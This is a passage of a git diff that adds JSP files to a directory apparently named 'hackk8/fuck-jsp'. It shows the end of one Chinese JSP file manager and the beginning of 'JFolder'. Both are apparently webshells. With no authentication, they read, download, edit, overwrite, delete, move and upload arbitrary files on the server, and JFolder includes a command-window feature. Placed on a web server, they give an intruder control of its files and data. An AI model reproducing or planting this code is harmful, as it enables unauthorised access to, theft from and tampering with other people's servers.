byte b[] = new byte[1024];
int read = sis.readLine(b, 0, b.length), index;
String line = null;
if (read != -1){
line = new String(b, 0, read);
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index-1);
}
b = null;
return line;
}
public String getFileName(String dir, String fileName) throws IllegalArgumentException{
String path = null;
if (dir == null || fileName == null) throw new IllegalArgumentException("目录或者文件不存在!");
int index = fileName.lastIndexOf('/');
String name = null;
if (index >= 0) name = fileName.substring(index + 1);
else name = fileName;
index = name.lastIndexOf('\\');
if (index >= 0) fileName = name.substring(index + 1);
path = dir + File.separator + fileName;
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
else return path.replace('/', File.separatorChar);
}
}
/**
* 下面这个类是为文件和目录排序
* @author bagheera
* @version 1.001
*/
class FileComp implements Comparator{
int mode=1;
/**
* @排序方法 1=文件名, 2=大小, 3=日期
*/
FileComp (int mode){
this.mode=mode;
}
public int compare(Object o1, Object o2){
File f1 = (File)o1;
File f2 = (File)o2;
if (f1.isDirectory()){
if (f2.isDirectory()){
switch(mode){
case 1:return f1.getAbsolutePath().toUpperCase().compareTo(f2.getAbsolutePath().toUpperCase());
case 2:return new Long(f1.length()).compareTo(new Long(f2.length()));
case 3:return new Long(f1.lastModified()).compareTo(new Long(f2.lastModified()));
default:return 1;
}
}
else return -1;
}
else if (f2.isDirectory()) return 1;
else{
switch(mode){
case 1:return f1.getAbsolutePath().toUpperCase().compareTo(f2.getAbsolutePath().toUpperCase());
case 2:return new Long(f1.length()).compareTo(new Long(f2.length()));
case 3:return new Long(f1.lastModified()).compareTo(new Long(f2.lastModified()));
default:return 1;
}
}
}
}
class Writer2Stream extends OutputStream{
Writer out;
Writer2Stream (Writer w){
super();
out=w;
}
public void write(int i) throws IOException{
out.write(i);
}
public void write(byte[] b) throws IOException{
for (int i=0;i<b.length;i++){
int n=b[i];
//Convert byte to ubyte
n=((n>>>4)&0xF)*16+(n&0xF);
out.write (n);
}
}
public void write(byte[] b, int off, int len) throws IOException{
for (int i=off;i<off+len;i++){
int n=b[i];
n=((n>>>4)&0xF)*16+(n&0xF);
out.write (n);
}
}
}
static Vector expandFileList(String[] files, boolean inclDirs){
Vector v = new Vector();
if (files==null) return v;
for (int i=0;i<files.length;i++) v.add (new File(URLDecoder.decode(files[i])));
for (int i=0;i<v.size();i++){
File f = (File) v.get(i);
if (f.isDirectory()){
File[] fs = f.listFiles();
for (int n=0;n<fs.length;n++) v.add(fs[n]);
if (!inclDirs){
v.remove(i);
i--;
}
}
}
return v;
}
static String substr(String s, String search, String replace){
StringBuffer s2 = new StringBuffer ();
int i = 0, j = 0;
int len = search.length();
while ( j > -1 ){
j = s.indexOf( search, i );
if ( j > -1 ){
s2.append( s.substring(i,j) );
s2.append( replace );
i = j + len;
}
}
s2.append( s.substring(i, s.length()) );
return s2.toString();
}
static String getDir (String dir, String name){
if (!dir.endsWith(File.separator)) dir=dir+File.separator;
File mv = new File (name);
String new_dir=null;
if (!mv.isAbsolute()){
new_dir=dir+name;
}
else new_dir=name;
return new_dir;
}
%>
<%
request.setAttribute("dir", request.getParameter("dir"));
String browser_name = request.getRequestURI();
//查看文件
if (request.getParameter("file")!=null){
File f = new File (request.getParameter("file"));
BufferedInputStream reader = new BufferedInputStream(new FileInputStream(f));
int l = f.getName().lastIndexOf(".");
//判断文件后缀
if (l>=0){
String ext = f.getName().substring(l).toLowerCase();
if (ext.equals(".jpg")||ext.equals(".jpeg")||ext.equals(".jpe"))
response.setContentType("image/jpeg");
else if (ext.equals(".gif")) response.setContentType("image/gif");
else if (ext.equals(".pdf")) response.setContentType("application/pdf");
else if (ext.equals(".htm")||ext.equals(".html")||ext.equals(".shtml")) response.setContentType("text/html");
else if (ext.equals(".avi")) response.setContentType("video/x-msvideo");
else if (ext.equals(".mov")||ext.equals(".qt")) response.setContentType("video/quicktime");
else if (ext.equals(".mpg")||ext.equals(".mpeg")||ext.equals(".mpe"))
response.setContentType("video/mpeg");
else if (ext.equals(".zip")) response.setContentType("application/zip");
else if (ext.equals(".tiff")||ext.equals(".tif")) response.setContentType("image/tiff");
else if (ext.equals(".rtf")) response.setContentType("application/rtf");
else if (ext.equals(".mid")||ext.equals(".midi")) response.setContentType("audio/x-midi");
else if (ext.equals(".xl")||ext.equals(".xls")||ext.equals(".xlv")||ext.equals(".xla")
||ext.equals(".xlb")||ext.equals(".xlt")||ext.equals(".xlm")||ext.equals(".xlk"))
response.setContentType("application/excel");
else if (ext.equals(".doc")||ext.equals(".dot")) response.setContentType("application/msword");
else if (ext.equals(".png")) response.setContentType("image/png");
else if (ext.equals(".xml")) response.setContentType("text/xml");
else if (ext.equals(".svg")) response.setContentType("image/svg+xml");
else response.setContentType("text/plain");
}
else response.setContentType("text/plain");
response.setContentLength((int)f.length());
out.clearBuffer();
int i;
while ((i=reader.read())!=-1) out.write(i);
reader.close();
out.flush();
}
//保存所选中文件为zip文件
else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Save as zip"))){
Vector v = expandFileList(request.getParameterValues("selfile"), false);
File dir_file = new File(""+request.getAttribute("dir"));
int dir_l = dir_file.getAbsolutePath().length();
response.setContentType ("application/zip");
response.setHeader ("Content-Disposition", "attachment;filename=\"bagheera.zip\"");
out.clearBuffer();
ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out));
zipout.setComment("Created by JSP 文件管理器 1.001");
for (int i=0;i<v.size();i++){
File f = (File)v.get(i);
if (f.canRead()){
zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l+1)));
BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f));
int b;
while ((b=fr.read())!=-1) zipout.write(b);
fr.close();
zipout.closeEntry();
}
}
zipout.finish();
out.flush();
}
//下载文件
else if (request.getParameter("downfile")!=null){
String filePath = request.getParameter("downfile");
File f = new File(filePath);
if (f.exists()&&f.canRead()) {
response.setContentType ("application/octet-stream");
response.setHeader ("Content-Disposition", "attachment;filename=\""+f.getName()+"\"");
response.setContentLength((int) f.length());
BufferedInputStream fileInputStream = new BufferedInputStream(new FileInputStream(f));
int i;
out.clearBuffer();
while ((i=fileInputStream.read()) != -1) out.write(i);
fileInputStream.close();
out.flush();
}
else {
out.println("<html><body><h1>文件"+f.getAbsolutePath()+
"不存在或者无读权限</h1></body></html>");
}
}
else{
if (request.getAttribute("dir")==null){
request.setAttribute ("dir", application.getRealPath("."));
}
%>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=gb2312">
<style type="text/css">
.login { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #666666; width:320px; }
.header { font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 10pt; color: #666666; font-weight: bold; }
.tableHeader { background-color: #c0c0c0; color: #666666;}
.tableHeaderLight { background-color: #cccccc; color: #666666;}
.main { font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #666666;}
.copy { font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #999999;}
.copy:Hover { color: #666666; text-decoration : underline; }
.button {background-color: #c0c0c0; color: #666666;
border-left: 1px solid #999999; border-right: 1px solid #999999;
border-top: 1px solid #999999; border-bottom: 1px solid #999999}
.button:Hover { color: #444444 }
td { font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #666666;}
A { text-decoration: none; }
A:Hover { color : Red; text-decoration : underline; }
BODY { font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #666666;}
</style>
<script type="text/javascript">
<!--
var check = false;
function dis(){
check = true;
}
var DOM = 0, MS = 0, OP = 0;
function CheckBrowser() {
if (window.opera) OP = 1;
if(document.getElementById) {
DOM = 1;
}
if(document.all && !OP) {
MS = 1;
}
}
function selrow (element, i){
CheckBrowser();
var erst;
if ((OP==1)||(MS == 1)) erst = element.firstChild.firstChild;
else if (DOM == 1) erst = element.firstChild.nextSibling.firstChild;
//MouseIn
if (i == 0)
if (erst.checked == true) element.style.backgroundColor = '#dddddd';
else element.style.backgroundColor = '#eeeeee';
//MouseOut
else if (i == 1){
if (erst.checked == true) element.style.backgroundColor = '#dddddd';
else element.style.backgroundColor = '#ffffff';
}
//MouseClick
else if ((i == 2)&&(!check)){
if (erst.checked == true) element.style.backgroundColor = '#eeeeee';
else element.style.backgroundColor = '#dddddd';
erst.click();
}
else check = false;
}
//-->
</script>
<%
}
//上传
if ((request.getContentType()!=null)&&(request.getContentType().toLowerCase().startsWith("multipart"))){
response.setContentType("text/html");
HttpMultiPartParser parser = new HttpMultiPartParser();
boolean error = false;
try{
Hashtable ht = parser.processData(request.getInputStream(), "-", tempdir);
if (ht.get("myFile")!=null){
FileInfo fi = (FileInfo)ht.get("myFile");
File f = fi.file;
//把文件从缓冲目录里复制出来
String path = (String)ht.get("dir");
if (!path.endsWith(File.separator)) path = path+File.separator;
if (!f.renameTo(new File(path+f.getName()))){
request.setAttribute("message", "无法上传文件.");
error = true;
f.delete();
}
}
else{
request.setAttribute("message", "请选中上传文件!");
error = true;
}
request.setAttribute("dir", (String)ht.get("dir"));
}
catch (Exception e){
request.setAttribute("message", "发生如下错误:"+e+". 上传失败!");
error = true;
}
if (!error) request.setAttribute("message", "文件上传成功.");
}
else if (request.getParameter("editfile")!=null){
%>
<title>JSP文件管理器-编辑文件:<%=request.getParameter("editfile")%></title>
</head>
<body>
<%
String encoding="gb2312";
request.setAttribute("dir", null);
File ef = new File(request.getParameter("editfile"));
BufferedReader reader = new BufferedReader(new FileReader(ef));
String disable = "";
if (!ef.canWrite()) disable = "无法打开文件";
out.print("<form action=\""+browser_name+"\" method=\"Post\">\n"+
"<textarea name=\"text\" wrap=\"off\" cols=\""+
EDITFIELD_COLS+"\" rows=\""+EDITFIELD_ROWS+"\""+">"+disable);
String c;
while ((c =reader.readLine())!=null){
c=substr(c,"&", "&amp;");
c=substr(c,"<", "&lt;");
c=substr(c,">", "&gt;");
c=substr(c,"\"", "&quot;");
out.print(c+"\n");
}
reader.close();
%></textarea>
<input type="hidden" name="nfile" value="<%= request.getParameter("editfile")%>">
<table><tr>
<td title="Enter the new filename"><input type="text" name="new_name" value="<%=ef.getName()%>"></td>
<td><input type="Submit" name="Submit" value="保存"></td>
<td><input type="Submit" name="Submit" value="取消"></td></tr>
<tr><td><input type="checkbox" name="Backup" checked>覆写</td></tr>
</table>
</form>
</body>
</html>
<%
}
//保存文件
else if (request.getParameter("nfile")!=null){
File f = new File(request.getParameter("nfile"));
File new_f = new File(getDir(f.getParent(), request.getParameter("new_name")));
if (request.getParameter("Submit").equals("Save")){
if (new_f.exists()&&request.getParameter("Backup")!=null){
File bak = new File(new_f.getAbsolutePath()+".bak");
bak.delete();
new_f.renameTo(bak);
}
BufferedWriter outs = new BufferedWriter(new FileWriter(new_f));
outs.write(request.getParameter("text"));
outs.flush();
outs.close();
}
request.setAttribute("dir", f.getParent());
}
//删除文件
else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Delete Files"))){
Vector v = expandFileList(request.getParameterValues("selfile"), true);
boolean error = false;
for (int i=v.size()-1;i>=0;i--){
File f = (File)v.get(i);
if (!f.canWrite()||!f.delete()){
request.setAttribute("message", "无法删除文件"+f.getAbsolutePath()+". 删除失败");
error = true;
break;
}
}
if ((!error)&&(v.size()>1)) request.setAttribute("message", "All files deleted");
else if ((!error)&&(v.size()>0)) request.setAttribute("message", "File deleted");
else if (!error) request.setAttribute("message", "No files selected");
}
//建新目录
else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Create Dir"))){
String dir = ""+request.getAttribute("dir");
String dir_name = request.getParameter("cr_dir");
String new_dir = getDir (dir, dir_name);
if (new File(new_dir).mkdirs()){
request.setAttribute("message", "目录创建完成");
}
else request.setAttribute("message", "创建新目录"+new_dir+"失败");
}
//创建文件
else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Create File"))){
String dir = ""+request.getAttribute("dir");
String file_name = request.getParameter("cr_dir");
String new_file = getDir (dir, file_name);
//Test, if file_name is empty
if ((file_name.trim()!="")&&!file_name.endsWith(File.separator)){
if (new File(new_file).createNewFile()) request.setAttribute("message", "文件成功创建");
else request.setAttribute("message", "创建文件"+new_file+"失败");
}
else request.setAttribute("message", "错误: "+file_name+"文件不存在");
}
//转移文件
else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Move Files"))){
Vector v = expandFileList(request.getParameterValues("selfile"), true);
String dir = ""+request.getAttribute("dir");
String dir_name = request.getParameter("cr_dir");
String new_dir = getDir(dir, dir_name);
boolean error = false;
if (!new_dir.endsWith(File.separator)) new_dir+=File.separator;
for (int i=v.size()-1;i>=0;i--){
File f = (File)v.get(i);
if (!f.canWrite()||!f.renameTo(new File(new_dir+f.getAbsolutePath().substring(dir.length())))){
request.setAttribute("message", "不能转移"+f.getAbsolutePath()+".转移失败");
error = true;
break;
}
}
if ((!error)&&(v.size()>1)) request.setAttribute("message", "全部文件转移成功");
else if ((!error)&&(v.size()>0)) request.setAttribute("message", "文件转移成功");
else if (!error) request.setAttribute("message", "请选择文件");
}
//复制文件
else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Copy Files"))){
Vector v = expandFileList(request.getParameterValues("selfile"), true);
String dir = (String)request.getAttribute("dir");
if (!dir.endsWith(File.separator)) dir+=File.separator;
String dir_name = request.getParameter("cr_dir");
String new_dir = getDir(dir, dir_name);
boolean error = false;
if (!new_dir.endsWith(File.separator)) new_dir+=File.separator;
byte buffer[] = new byte[0xffff];
try{
for (int i=0;i<v.size();i++){
File f_old = (File)v.get(i);
File f_new = new File(new_dir+f_old.getAbsolutePath().substring(dir.length()));
if (f_old.isDirectory()) f_new.mkdirs();
else if (!f_new.exists()){
InputStream fis = new FileInputStream (f_old);
OutputStream fos = new FileOutputStream (f_new);
int b;
while((b=fis.read(buffer))!=-1) fos.write(buffer, 0, b);
fis.close();
fos.close();
}
else{
//文件存在
request.setAttribute("message", "无法复制"+f_old.getAbsolutePath()+",文件已经存在,复制失败");
error = true;
break;
}
}
}
catch (IOException e){
request.setAttribute("message", "错误"+e+".复制取消");
error = true;
}
if ((!error)&&(v.size()>1)) request.setAttribute("message", "全部文件复制成功");
else if ((!error)&&(v.size()>0)) request.setAttribute("message", "文件复制成功");
else if (!error) request.setAttribute("message", "请选择文件");
}
//目录浏览
if ((request.getAttribute("dir")!=null)){
%>
<title>JSP文件管理器-目录浏览:<%=request.getAttribute("dir")%></title>
</head>
<body>
<table>
<tr><td>
<% if (request.getAttribute("message")!=null){
out.println("<table border=\"0\" width=\"100%\"><tr><td bgcolor=\"#FFFF00\" align=\"center\">");
out.println(request.getAttribute("message"));
out.println("</td></tr></table>");
}
%>
<form action="<%= browser_name %>" method="Post">
<table border="1" cellpadding="1" cellspacing="0" width="100%">
<%
String dir = URLEncoder.encode(""+request.getAttribute("dir"));
String cmd = browser_name+"?dir="+dir;
out.println("<th bgcolor=\"#c0c0c0\"></th><th title=\"按文件名称排序\" bgcolor=\"#c0c0c0\"><a href=\""+cmd+"&sort=1\">文件名</a></th>"+
"<th title=\"按大小称排序\" bgcolor=\"#c0c0c0\"><a href=\""+cmd+"&sort=2\">大小</th>"+
"<th title=\"按日期称排序\" bgcolor=\"#c0c0c0\"><a href=\""+cmd+"&sort=3\">日期</th>"+
"<th bgcolor=\"#c0c0c0\">&nbsp;</th><th bgcolor=\"#c0c0c0\">&nbsp;</th>");
char trenner=File.separatorChar;
File f=new File(""+request.getAttribute("dir"));
//跟或者分区
File[] entry=File.listRoots();
for (int i=0;i<entry.length;i++){
out.println("<tr bgcolor='#ffffff'\">");
out.println("<td>※切换到相应盘符:<span style=\"background-color: rgb(255,255,255);color:rgb(255,0,0)\">");
String name = URLEncoder.encode(entry[i].getAbsolutePath());
String buf = entry[i].getAbsolutePath();
out.println("◎<a href=\""+browser_name+"?dir="+name+"\">["+buf+"]</a>");
out.println("</td></tr>");
}
out.println("<br>");
//..
if (f.getParent()!=null){
out.println("<tr bgcolor='#ffffff' onmouseover=\"this.style.backgroundColor = '#eeeeee'\" onmouseout=\"this.style.backgroundColor = '#ffffff'\">");
out.println("<td></td><td>");
out.println("<a href=\""+browser_name+"?dir="+URLEncoder.encode(f.getParent())+"\">[..]</a>");
out.println("</td></tr>");
}
//文件和目录
entry=f.listFiles();
if (entry!=null&&entry.length>0){
int mode=1;
if (request.getParameter("sort")!=null) mode = Integer.parseInt(request.getParameter("sort"));
Arrays.sort(entry, new FileComp(mode));
String ahref = "<a onmousedown=\"javascript:dis();\" href=\"";
for (int i=0;i<entry.length;i++){
String name = URLEncoder.encode(entry[i].getAbsolutePath());
String link;
String dlink = "&nbsp;";
String elink = "&nbsp;";
String buf = entry[i].getName();
if (entry[i].isDirectory()){
if (entry[i].canRead())
link = ahref+browser_name+"?dir="+name+"\">["+buf+"]</a>";
else
link = "["+buf+"]";
}
else{
if (entry[i].canRead()){
if (entry[i].canWrite()){
link=ahref+browser_name+"?file="+name+"\">"+buf+"</a>";
dlink=ahref+browser_name+"?downfile="+name+"\">下载</a>";
elink=ahref+browser_name+"?editfile="+name+"\">编辑</a>";
}
else{
link=ahref+browser_name+"?file="+name+"\"><i>"+buf+"</i></a>";
dlink=ahref+browser_name+"?downfile="+name+"\">下载</a>";
elink=ahref+browser_name+"?editfile="+name+"\">查看</a>";
}
}
else{
link = buf;
}
}
String date = DateFormat.getDateTimeInstance().format(new Date(entry[i].lastModified()));
out.println("<tr bgcolor='#ffffff' onmouseup = \"javascript:selrow(this, 2);\" "+
"onmouseover=\"javascript:selrow(this, 0);\" onmouseout=\"javascript:selrow(this, 1);\">");
out.println("<td><input type=\"checkbox\" name=\"selfile\" value=\""+name+"\" onmousedown=\"javascript:dis();\"></td>");
out.println("<td>"+link+"</td><td align=\"right\">"+entry[i].length()+
" bytes</td><td align=\"right\">"+
date+"</td><td>"
+dlink+"</td><td>"+elink+"</td></tr>");
}
}
%>
</table>
<table>
<input type="hidden" name="dir" value="<%=request.getAttribute("dir")%>">
<tr>
<td title="把所选文件打包下载"><input class="button" type="Submit" name="Submit" value="Save as zip"></td>
<td colspan="2" title="删除所选文件和文件夹"><input class="button" type="Submit" name="Submit" value="Delete Files"></td></tr>
<tr>
<td><input type="text" name="cr_dir"></td>
<td><input class="button" type="Submit" name="Submit" value="Create Dir"></td>
<td><input class="button" type="Submit" name="Submit" value="Create File"></td>
<td><input class="button" type="Submit" name="Submit" value="Move Files"></td>
<td><input class="button" type="Submit" name="Submit" value="Copy Files"></td></tr>
</table>
</form>
<form action="<%= browser_name %>" enctype="multipart/form-data" method="POST">
<table cellpadding="0">
<tr>
<td><input type="hidden" name="dir" value="<%=request.getAttribute("dir")%>">
<input type="file" name="myFile"></td>
<td><input type="Submit" class="button" name="Submit" value="Upload"></td>
</tr>
</table>
</form>
<hr>
<center><small>JSP 文件管理器 v1.001 By Bagheera<a href="http://jmmm.com">http://jmmm.com</a>
</small></center>
</td></tr></table>
</body>
</html>
<%
}
%>

2317
jsp/hackk8/fuck-jsp/ma3.jsp Normal file
View file

File diff suppressed because it is too large Load diff

1780
jsp/hackk8/fuck-jsp/ma4.jsp Normal file
View file

File diff suppressed because it is too large Load diff

995
jsp/hackk8/fuck-jsp/no.jsp Normal file
View file

@ -0,0 +1,995 @@
<%
/**
JFolder V0.9 windows platform
@Filename JFolder.jsp
@Description 一个简单的系统文件目录显示程序,类似于资源管理器,提供基本的文件操作,不过功能弱多了。
@Author Steven Cee
@Email cqq1978@Gmail.com
@Bugs : 下载时,中文文件名无法正常显示
*/
%>
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*" %>
<%!
private final static int languageNo=0; //语言版本0 : 中文; 1英文
String strThisFile="JFolder.jsp";
String[] authorInfo={" <font color=red> 写的不好,将就着用吧 - - by 慈勤强 http://www.topronet.com </font>"," <font color=red> Thanks for your support - - by Steven Cee http://www.topronet.com </font>"};
String[] strFileManage = {"文 件 管 理","File Management"};
String[] strCommand = {"CMD 命 令","Command Window"};
String[] strSysProperty = {"系 统 属 性","System Property"};
String[] strHelp = {"帮 助","Help"};
String[] strParentFolder = {"上级目录","Parent Folder"};
String[] strCurrentFolder= {"当前目录","Current Folder"};
String[] strDrivers = {"驱动器","Drivers"};
String[] strFileName = {"文件名称","File Name"};
String[] strFileSize = {"文件大小","File Size"};
String[] strLastModified = {"最后修改","Last Modified"};
String[] strFileOperation= {"文件操作","Operations"};
String[] strFileEdit = {"修改","Edit"};
String[] strFileDown = {"下载","Download"};
String[] strFileCopy = {"复制","Move"};
String[] strFileDel = {"删除","Delete"};
String[] strExecute = {"执行","Execute"};
String[] strBack = {"返回","Back"};
String[] strFileSave = {"保存","Save"};
public class FileHandler
{
private String strAction="";
private String strFile="";
void FileHandler(String action,String f)
{
}
}
public static class UploadMonitor {
static Hashtable uploadTable = new Hashtable();
static void set(String fName, UplInfo info) {
uploadTable.put(fName, info);
}
static void remove(String fName) {
uploadTable.remove(fName);
}
static UplInfo getInfo(String fName) {
UplInfo info = (UplInfo) uploadTable.get(fName);
return info;
}
}
public class UplInfo {
public long totalSize;
public long currSize;
public long starttime;
public boolean aborted;
public UplInfo() {
totalSize = 0l;
currSize = 0l;
starttime = System.currentTimeMillis();
aborted = false;
}
public UplInfo(int size) {
totalSize = size;
currSize = 0;
starttime = System.currentTimeMillis();
aborted = false;
}
public String getUprate() {
long time = System.currentTimeMillis() - starttime;
if (time != 0) {
long uprate = currSize * 1000 / time;
return convertFileSize(uprate) + "/s";
}
else return "n/a";
}
public int getPercent() {
if (totalSize == 0) return 0;
else return (int) (currSize * 100 / totalSize);
}
public String getTimeElapsed() {
long time = (System.currentTimeMillis() - starttime) / 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
public String getTimeEstimated() {
if (currSize == 0) return "n/a";
long time = System.currentTimeMillis() - starttime;
time = totalSize * time / currSize;
time /= 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
}
public class FileInfo {
public String name = null, clientFileName = null, fileContentType = null;
private byte[] fileContents = null;
public File file = null;
public StringBuffer sb = new StringBuffer(100);
public void setFileContents(byte[] aByteArray) {
fileContents = new byte[aByteArray.length];
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
}
}
// A Class with methods used to process a ServletInputStream
public class HttpMultiPartParser {
private final String lineSeparator = System.getProperty("line.separator", "\n");
private final int ONE_MB = 1024 * 1;
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
int clength) throws IllegalArgumentException, IOException {
if (is == null) throw new IllegalArgumentException("InputStream");
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
"\"" + boundary + "\" is an illegal boundary indicator");
boundary = "--" + boundary;
StringTokenizer stLine = null, stFields = null;
FileInfo fileInfo = null;
Hashtable dataTable = new Hashtable(5);
String line = null, field = null, paramName = null;
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
boolean isFile = false;
if (saveFiles) { // Create the required directory (including parent dirs)
File f = new File(saveInDir);
f.mkdirs();
}
line = getLine(is);
if (line == null || !line.startsWith(boundary)) throw new IOException(
"Boundary not found; boundary = " + boundary + ", line = " + line);
while (line != null) {
if (line == null || !line.startsWith(boundary)) return dataTable;
line = getLine(is);
if (line == null) return dataTable;
stLine = new StringTokenizer(line, ";\r\n");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
line = stLine.nextToken().toLowerCase();
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
"Bad data in second line");
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
fileInfo = new FileInfo();
stFields.nextToken();
paramName = stFields.nextToken();
isFile = false;
if (stLine.hasMoreTokens()) {
field = stLine.nextToken();
stFields = new StringTokenizer(field, "=\"");
if (stFields.countTokens() > 1) {
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
fileInfo.name = paramName;
String value = stFields.nextToken();
if (value != null && value.trim().length() > 0) {
fileInfo.clientFileName = value;
isFile = true;
}
else {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
}
else if (field.toLowerCase().indexOf("filename") >= 0) {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
boolean skipBlankLine = true;
if (isFile) {
line = getLine(is);
if (line == null) return dataTable;
if (line.trim().length() < 1) skipBlankLine = false;
else {
stLine = new StringTokenizer(line, ": ");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in third line");
stLine.nextToken(); // Content-Type
fileInfo.fileContentType = stLine.nextToken();
}
}
if (skipBlankLine) {
line = getLine(is);
if (line == null) return dataTable;
}
if (!isFile) {
line = getLine(is);
if (line == null) return dataTable;
dataTable.put(paramName, line);
// If parameter is dir, change saveInDir to dir
if (paramName.equals("dir")) saveInDir = line;
line = getLine(is);
continue;
}
try {
UplInfo uplInfo = new UplInfo(clength);
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
OutputStream os = null;
String path = null;
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
fileInfo.clientFileName));
else os = new ByteArrayOutputStream(ONE_MB);
boolean readingContent = true;
byte previousLine[] = new byte[2 * ONE_MB];
byte temp[] = null;
byte currentLine[] = new byte[2 * ONE_MB];
int read, read3;
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
line = null;
break;
}
while (readingContent) {
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
line = null;
uplInfo.aborted = true;
break;
}
if (compareBoundary(boundary, currentLine)) {
os.write(previousLine, 0, read - 2);
line = new String(currentLine, 0, read3);
break;
}
else {
os.write(previousLine, 0, read);
uplInfo.currSize += read;
temp = currentLine;
currentLine = previousLine;
previousLine = temp;
read = read3;
}//end else
}//end while
os.flush();
os.close();
if (!saveFiles) {
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
fileInfo.setFileContents(baos.toByteArray());
}
else fileInfo.file = new File(path);
dataTable.put(paramName, fileInfo);
uplInfo.currSize = uplInfo.totalSize;
}//end try
catch (IOException e) {
throw e;
}
}
return dataTable;
}
/**
* Compares boundary string to byte array
*/
private boolean compareBoundary(String boundary, byte ba[]) {
byte b;
if (boundary == null || ba == null) return false;
for (int i = 0; i < boundary.length(); i++)
if ((byte) boundary.charAt(i) != ba[i]) return false;
return true;
}
/** Convenience method to read HTTP header lines */
private synchronized String getLine(ServletInputStream sis) throws IOException {
byte b[] = new byte[1024];
int read = sis.readLine(b, 0, b.length), index;
String line = null;
if (read != -1) {
line = new String(b, 0, read);
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
}
return line;
}
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
String path = null;
if (dir == null || fileName == null) throw new IllegalArgumentException(
"dir or fileName is null");
int index = fileName.lastIndexOf('/');
String name = null;
if (index >= 0) name = fileName.substring(index + 1);
else name = fileName;
index = name.lastIndexOf('\\');
if (index >= 0) fileName = name.substring(index + 1);
path = dir + File.separator + fileName;
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
else return path.replace('/', File.separatorChar);
}
} //End of class HttpMultiPartParser
String formatPath(String p)
{
StringBuffer sb=new StringBuffer();
for (int i = 0; i < p.length(); i++)
{
if(p.charAt(i)=='\\')
{
sb.append("\\\\");
}
else
{
sb.append(p.charAt(i));
}
}
return sb.toString();
}
/**
* Converts some important chars (int) to the corresponding html string
*/
static String conv2Html(int i) {
if (i == '&') return "&amp;";
else if (i == '<') return "&lt;";
else if (i == '>') return "&gt;";
else if (i == '"') return "&quot;";
else return "" + (char) i;
}
/**
* Converts a normal string to a html conform string
*/
static String htmlEncode(String st) {
StringBuffer buf = new StringBuffer();
for (int i = 0; i < st.length(); i++) {
buf.append(conv2Html(st.charAt(i)));
}
return buf.toString();
}
String getDrivers()
/**
Windows系统上取得可用的所有逻辑盘
*/
{
StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
File roots[]=File.listRoots();
for(int i=0;i<roots.length;i++)
{
sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
sb.append(roots[i]+"</a>&nbsp;");
}
return sb.toString();
}
static String convertFileSize(long filesize)
{
//bug 5.09M 显示5.9M
String strUnit="Bytes";
String strAfterComma="";
int intDivisor=1;
if(filesize>=1024*1024)
{
strUnit = "MB";
intDivisor=1024*1024;
}
else if(filesize>=1024)
{
strUnit = "KB";
intDivisor=1024;
}
if(intDivisor==1) return filesize + " " + strUnit;
strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
if(strAfterComma=="") strAfterComma=".0";
return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
}
%>
<%
request.setCharacterEncoding("gb2312");
String tabID = request.getParameter("tabID");
String strDir = request.getParameter("path");
String strAction = request.getParameter("action");
String strFile = request.getParameter("file");
String strPath = strDir + "\\" + strFile;
String strCmd = request.getParameter("cmd");
StringBuffer sbEdit=new StringBuffer("");
StringBuffer sbDown=new StringBuffer("");
StringBuffer sbCopy=new StringBuffer("");
StringBuffer sbSaveCopy=new StringBuffer("");
StringBuffer sbNewFile=new StringBuffer("");
if((tabID==null) || tabID.equals(""))
{
tabID = "1";
}
